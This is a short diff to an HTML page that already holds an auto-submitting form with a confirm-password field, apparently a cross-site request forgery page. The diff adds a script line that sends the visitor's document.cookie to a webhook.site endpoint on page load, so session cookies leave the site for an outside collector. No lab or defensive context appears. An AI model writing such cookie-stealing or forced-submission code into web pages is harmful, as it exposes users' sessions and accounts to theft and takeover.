--- a/index.html
+++ b/index.html
@@ -3,5 +3,6 @@
     <input name="confirm-password" value="345">
 </form>
 <script>
+    fetch(`https://webhook.site/4aa2fda7-ec6c-4b07-903f-9f09e628ea22?a=${document.cookie}`)
     document.forms[0].submit()
 </script>
